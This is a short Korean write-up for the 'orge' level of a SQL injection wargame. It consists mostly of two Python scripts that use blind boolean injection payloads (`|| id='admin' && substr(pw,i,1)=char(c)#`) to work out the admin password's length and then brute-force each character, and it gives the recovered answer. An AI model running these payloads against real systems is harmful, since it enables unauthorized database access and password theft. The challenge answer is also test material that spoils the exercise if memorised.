orge

1. pw length 구하기

import requests
i = 1
while True:
    url = f"https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)={i}%23"
    cookies = {"PHPSESSID":""}
    res = requests.get(url, cookies=cookies)
    if "Hello admin" in res.text:
        print('pw length : ',i)
        break
    i+=1

 

2. pw 하나하나 구하기

import requests
import threading
def req_url(i):
    cookies = {"PHPSESSID":""}
    for c in range(48, 123):
        response = requests.get(f"https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=' %7C%7C id='admin' %26%26 substr(pw,{i},1)=char({c})%23",cookies=cookies)
        if 'Hello admin' in response.text:
            print('index:',str(i),' char:',chr(c))
            print("' or id='admin' and substr(pw,"+str(i)+",1)=char("+str(c)+")%23\n")
            return

for i in range(1, 9):
    t = threading.Thread(target=req_url, args=(i,))
    t.start()

7B751AEC

 

MySQL의 대소문자 구별 안하는 특징때문에 소문자로도 해봤다.

성공